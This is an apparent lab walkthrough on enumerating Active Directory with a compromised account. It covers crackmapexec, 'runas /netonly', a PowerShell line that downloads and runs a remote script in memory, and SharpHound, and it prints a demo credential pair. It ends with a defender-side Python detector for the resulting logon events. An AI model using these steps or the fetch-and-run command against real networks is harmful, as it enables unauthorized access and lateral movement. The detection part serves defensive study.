Enumerate Active Directory (AD) remotely with any valid user account's credentials (runas and PsExec), lateral movement
Method 1 (requires a Windows machine):
Prerequisite: credentials for at least one account you have compromised (support:#00^BlackKnight in this demo).
First, check whether those credentials give us RCE over SMB or WinRM using crackmapexec.
If you are allowed to run commands remotely, crackmapexec shows "Pwned!". If instead you have exhausted enumeration of LDAP, SMB, Kerberos, etc. and found nothing interesting, we can impersonate the valid AD user with the runas command on Windows. Note that /netonly keeps your local identity and only applies the supplied credentials to outbound network connections, so runas itself does not validate the password; the first query against the DC does.
runas /netonly /user:BLACKFIELD.local\support powershell
runas /netonly /user:<FQDN>\<username> powershell
Then, in the new PowerShell window, run the following (the -Server parameter is needed because this host is not joined to the target domain):
iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1'); Import-ActiveDirectory
$dC = "<DC IP>"
Get-ADDomain -Server $dC
Then we can run SharpHound remotely to collect AD information.
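From the defender's side, the runas /netonly step above leaves a distinctive trace on the host where it runs: Security Event ID 4624 with LogonType 9 (NewCredentials, logon process "seclogo"), accompanied by a 4648 "logon attempted using explicit credentials" event that names the supplied account. The following is an added detection example, not part of the original post; the event records are constructed to mimic those fields, and the pairing of 4624 and 4648 by the caller's SubjectLogonId within a short time window is this example's own heuristic.

```python
"""Flag runas /netonly style NewCredentials logons in Windows Security events.

Added defender-side example (not from the original post). A 4624 with
LogonType 9 means a caller cloned its token with new outbound credentials;
the matching 4648 carries the account whose credentials were supplied.
"""
from dataclasses import dataclass

# Constructed sample records: a subset of the real 4624/4648 fields.
SAMPLE_EVENTS = [
    {"EventID": 4624, "Time": 100, "LogonType": 2, "SubjectLogonId": "0x3e7",
     "SubjectUserName": "-", "TargetUserName": "alice", "LogonProcessName": "User32"},
    {"EventID": 4648, "Time": 150, "SubjectLogonId": "0x5a2c1", "SubjectUserName": "alice",
     "TargetDomainName": "BLACKFIELD.local", "TargetUserName": "support",
     "ProcessName": r"C:\Windows\System32\runas.exe"},
    {"EventID": 4624, "Time": 151, "LogonType": 9, "SubjectLogonId": "0x5a2c1",
     "SubjectUserName": "alice", "TargetUserName": "alice", "LogonProcessName": "seclogo"},
    {"EventID": 4624, "Time": 200, "LogonType": 3, "SubjectLogonId": "0x3e7",
     "SubjectUserName": "-", "TargetUserName": "svc_backup", "LogonProcessName": "NtLmSsp"},
]


@dataclass(frozen=True)
class NetOnlyLogon:
    local_user: str        # who invoked runas (Subject of the 4624)
    supplied_account: str  # DOMAIN\user passed to /netonly, taken from the 4648
    logon_process: str     # "seclogo" for runas /netonly


def find_netonly_logons(events, window=5):
    """Return 4624/LogonType 9 events, each paired with the closest 4648
    from the same caller logon session within `window` seconds (heuristic)."""
    explicit = [e for e in events if e.get("EventID") == 4648]
    hits = []
    for ev in events:
        if ev.get("EventID") != 4624 or ev.get("LogonType") != 9:
            continue
        supplied = "<unknown>"
        candidates = [x for x in explicit
                      if x.get("SubjectLogonId") == ev.get("SubjectLogonId")
                      and abs(x["Time"] - ev["Time"]) <= window]
        if candidates:
            x = min(candidates, key=lambda c: abs(c["Time"] - ev["Time"]))
            supplied = f"{x.get('TargetDomainName', '?')}\\{x.get('TargetUserName', '?')}"
        hits.append(NetOnlyLogon(ev.get("SubjectUserName", "?"), supplied,
                                 ev.get("LogonProcessName", "?")))
    return hits


if __name__ == "__main__":
    for h in find_netonly_logons(SAMPLE_EVENTS):
        print(f"NewCredentials logon by {h.local_user} using {h.supplied_account} "
              f"via {h.logon_process}")
```

The domain controller itself only sees the resulting network logons (LogonType 3) from the supplied account, so this host-side pairing is where the runas step is visible.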